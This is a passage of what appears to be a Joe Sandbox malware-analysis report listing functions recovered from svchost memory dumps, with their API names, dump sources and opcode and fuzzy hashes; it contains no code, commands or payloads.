                                                                                                                    Function 00007DF45B728194 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3755109111-0
                                                                                                                    • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                    • Instruction ID: af2fa6be1fbb92aa7b465c206d584c20b380046c53e0699537e89811344db0b8
                                                                                                                    • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                    • Instruction Fuzzy Hash: 71419230618E448FE758AB28D89867FB7E5FF59311F50053AE84FC22A1DF39D9018686
                                                                                                                    Function 00007DF45B729488 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3755109111-0
                                                                                                                    • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                    • Instruction ID: 3f8c43629cc6e5687bb2845d3ccf1b5b0c4e18eab0a6517862e0fac7b20e7945
                                                                                                                    • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                    • Instruction Fuzzy Hash: 6831A6307089544FFB94BA28988862FB3E4EF55315F94007AEC0FC22E6EF29DC41C695
                                                                                                                    Function 00007DF45B700E5C Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3388366904-0
                                                                                                                    • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                    • Instruction ID: c78db011df483303db3dabe6f5f58a42fcd3f67d87eca14f5ab4dbc16e943acf
                                                                                                                    • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                    • Instruction Fuzzy Hash: F421CC7170CB4C4FE354AA5868C667B77D4EB99720F10013FE98FC2352EE74A8064692
                                                                                                                    Function 00007DF45B6F7598 Relevance: 2.6, APIs: 2, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: freemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3061335427-0
                                                                                                                    • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                    • Instruction ID: af0e0c194a95fa1f933e8d9eb873f2e31bfcde307d4bdcc991bdddfad9dfcbe2
                                                                                                                    • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                    • Instruction Fuzzy Hash: 7F415D31608D0A8FDB88EF6CD888AA5B7E1FB68311711467BD40EC3765DB74E8808BC1
                                                                                                                    Function 00007DF45B7CCB9C Relevance: 2.6, APIs: 2, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                    • Instruction ID: 25b3e0e4ad9a6ea305ce76c53e04ef27d3d1f5c885b61e50bb8289e760f341b4
                                                                                                                    • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                    • Instruction Fuzzy Hash: 3921FE71A188584FDEA5FF2CC4C896977E1EB9871076502AADC1EC72AAD925ECC187C0
                                                                                                                    Function 00007DF45B6ED818 Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$AcceptConnectNameName_Portcallocfreemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2547275272-0
                                                                                                                    • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                    • Instruction ID: 2323521a977bfbfaec60c16cff225b6c0d0bdd239d9cf67265f14ccbdd99a45a
                                                                                                                    • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                    • Instruction Fuzzy Hash: AF01F231218E084FE748BB5CAC8A4B677E1E799762704817AE40AC3361DD39E8418BD2
                                                                                                                    Function 0000013E033430C7 Relevance: 1.9, APIs: 1, Instructions: 390memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2142356803.0000013E03340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013E03340000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_13e03340000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3298025750-0
                                                                                                                    • Opcode ID: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                    • Instruction ID: 2d60fc586d61c31ea991e2d0a24e89dbc50ec4740a1c19a989682960fffe7e86
                                                                                                                    • Opcode Fuzzy Hash: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                    • Instruction Fuzzy Hash: BAC18730218B098FDB58EF28C485BAAB7E1FB94311F04452DF49AC7296DB74F955CB81
                                                                                                                    Function 00007DF45B6E6984 Relevance: 1.9, APIs: 1, Instructions: 367timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Timer$CreateQueue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3971536239-0
                                                                                                                    • Opcode ID: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                    • Instruction ID: db3afa212f2e26cc6d4ee01a7ceaf476185f377efa9d8d18f5ab7335db6f98c3
                                                                                                                    • Opcode Fuzzy Hash: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                    • Instruction Fuzzy Hash: 7CB16430A1CA888FE765FB2898496AB73E1FB94310F50463BD45FC6395EF389541C782
                                                                                                                    Function 00007DF45B6E9BA4 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileMapping
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 524692379-0
                                                                                                                    • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                    • Instruction ID: 8d920211262543a4ae55c3b40bb705736c9096e405e6aef8d9c10f3a0a5f128d
                                                                                                                    • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                    • Instruction Fuzzy Hash: CFB10D71618A888FEB55FF24D8856ABB7E1FF94300F504A2EE44FC6391DE34A545CB82
                                                                                                                    Function 00007DF45B729A44 Relevance: 1.8, APIs: 1, Instructions: 269networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 98920635-0
                                                                                                                    • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                    • Instruction ID: eb85c7bbc9ced5434b7b188a43a0fb3a03b9ba780f33ebc92b75a75aacb9907d
                                                                                                                    • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                    • Instruction Fuzzy Hash: AB910070618E458FEB94EF28C4896AAB7F0FF15315F94017AD84FC66A1EB39E840CB51
                                                                                                                    Function 00007DF45B6D2514 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 31276548-0
                                                                                                                    • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                    • Instruction ID: b1c87b2f3db16100f0180d559453b95cbd9bd305268e58c94a5637c3980803f2
                                                                                                                    • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                    • Instruction Fuzzy Hash: 4751E730A1CE4D4FEB55BB6CD45876A72E1FB98300F00013AE84FC3394DEA9E8818782
                                                                                                                    Function 00007DF45B6E5870 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2039140958-0
                                                                                                                    • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                    • Instruction ID: 3d6bb71a2c163d30312a0e08e9cd4f11dc59fa903a8b3bf0b263f62cbbc24cb3
                                                                                                                    • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                    • Instruction Fuzzy Hash: BE613A7190CA888BD765FF64D8956EBB7E1FB94300F404A2FE48FC3251DE34A6458B42
                                                                                                                    Function 00007DF45B700BC4 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                    • Instruction ID: b66b43053c96ad8098729df6b7554a3e976d5769e595034ff8e14663e6b4ce36
                                                                                                                    • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                    • Instruction Fuzzy Hash: E851313461CB884FE764EB58D85576BBBE5FF94310F00052EE88EC3291EE74E9419B52
                                                                                                                    Function 00007DF45B6E84B4 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF45B6E37B8), ref: 00007DF45B6E85F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3978063606-0
                                                                                                                    • Opcode ID: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                    • Instruction ID: 53229a0c13e55c2122619462c707a2d6c02b97864b84d1a946783d1140a85f93
                                                                                                                    • Opcode Fuzzy Hash: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                    • Instruction Fuzzy Hash: 03415430B18A984FDB55FB68989557F73A1EB58700B144536E81FC7395EE28E8418B82
                                                                                                                    Function 00007DF45B6E36BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                    • Instruction ID: 233931f454c91bca7f146807915a6062c19c19ba1dc43839fae1126d510b8dfd
                                                                                                                    • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                    • Instruction Fuzzy Hash: 53317121B189886BEF95BB689C8657F72F2EF44300B50043AE84FC73D2DD18AC458787
                                                                                                                    Function 0000013E03301870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2514095188.0000013E03300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013E03300000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_13e03300000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1088084561-0
                                                                                                                    • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                    • Instruction ID: 8019841805a7704b3835a04bf05181af1c78d2224947285ed3de772684aec337
                                                                                                                    • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                    • Instruction Fuzzy Hash: A2318834700B074AEBAD96B884E47F272D0EB94311F1801A9E066D71D5EAADE6C9C7C0
                                                                                                                    Function 00007DF45B729878 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 98920635-0
                                                                                                                    • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                    • Instruction ID: ceca6fe7363110dfc47898f64d5a6775de6dfdf6df75ec896b680fdf0fb3d1c5
                                                                                                                    • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                    • Instruction Fuzzy Hash: F421A8307089044FEB58FB78988966AB3E1FB95325F54467AEC2FC63E6DF389C018651
                                                                                                                    Function 00007DF45B6E6748 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: getaddrinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 300660673-0
                                                                                                                    • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                    • Instruction ID: ea049f44cdc111e2d0bf85d3c48de3774c276981f2c0b9c17a3ef571fa3b6543
                                                                                                                    • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                    • Instruction Fuzzy Hash: 95313C70608A498FEB54EF24C898B5B77E1FF98714F104569D84EDB3A5DB39E802CB42
                                                                                                                    Function 00007DF45B6FA38C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                    • Instruction ID: 35188033a3a16a22efa4c8460e303d9c2d84f27a093ee67c5259f318a8eac9fc
                                                                                                                    • Opcode Fuzzy Hash: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                    • Instruction Fuzzy Hash: E7215331608A484FDF94FF28D845A9A77E1FF94315F00462AF84ED3251DE35E941CB91
                                                                                                                    Function 00007DF45B6D2B48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                    • Instruction ID: 78efdd6558a8159c4422210f7be4e99d78e4f607f965852e9ef16064d8374f0e
                                                                                                                    • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                    • Instruction Fuzzy Hash: 9101D630A149099FDB54EB69DC8862673E6FBCC315B444179E80EC7344DAB6AC91CB91
                                                                                                                    Function 00007DF45B728374 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: closesocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2781271927-0
                                                                                                                    • Opcode ID: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                    • Instruction ID: 9e2250720911255b114062d0dba1bc8c4583369d848e6e1ed396dbc32e7fb954
                                                                                                                    • Opcode Fuzzy Hash: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                    • Instruction Fuzzy Hash: 54014F70914A488FEB84DF18C4C87257BE4EF54329F4411AADC0ACA2A6D779DC90C780
                                                                                                                    Function 00007DF45B6D2D94 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 10892065-0
                                                                                                                    • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                    • Instruction ID: 6abf81fd7184d386eb5484394795e3289a9e73b6a2edb453fe374a8aac3ace16
                                                                                                                    • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                    • Instruction Fuzzy Hash: 65F0E521E0E64C5FE714BE7AACC026621A1EBC4320F14453BD90FC27D1DD7A88C95652
                                                                                                                    Function 00007DF45B6E3424 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCallerProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2663294120-0
                                                                                                                    • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                    • Instruction ID: 09d46c40c42bef28af9a6e4e223db1d8b929ed54e4d9b445f32b352d47e15371
                                                                                                                    • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                    • Instruction Fuzzy Hash: 19E0C212B08C0D1B6B6872AE288C57B55D6CBDC232304027BE81DC3395EC14CC820391
                                                                                                                    Function 00007DF45B700DCC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 973152223-0
                                                                                                                    • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                    • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                    • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                    • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                    Function 00007DF45B6E33F8 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                    • Instruction ID: d7e178526000163c4a08e9f2137543cae78ac60778d3353e2e2392ec6c7fe08b
                                                                                                                    • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                    • Instruction Fuzzy Hash: BCD0A721724D4D1FEA49773D1C9472A51D5EBDC321F50013BF80EC2381ED58CC590311
                                                                                                                    Function 00007DF45B7AE880 Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • calloc.MSVCRT(?,?,?,?,0000414D,?,?,00007DF45B7AEB21,?,?,?,?,0010D940,?,?,00007DF45B6F93F8), ref: 00007DF45B7AE908
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: calloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2635317215-0
                                                                                                                    • Opcode ID: 116888554fdc444eb3b31b19c2a321043db278ac29c98a48040ccefe69ec064d
                                                                                                                    • Instruction ID: 52081ad246a9faff4bf037a3ef10c73cdd3f64666faf659d35d72ffa22363a50
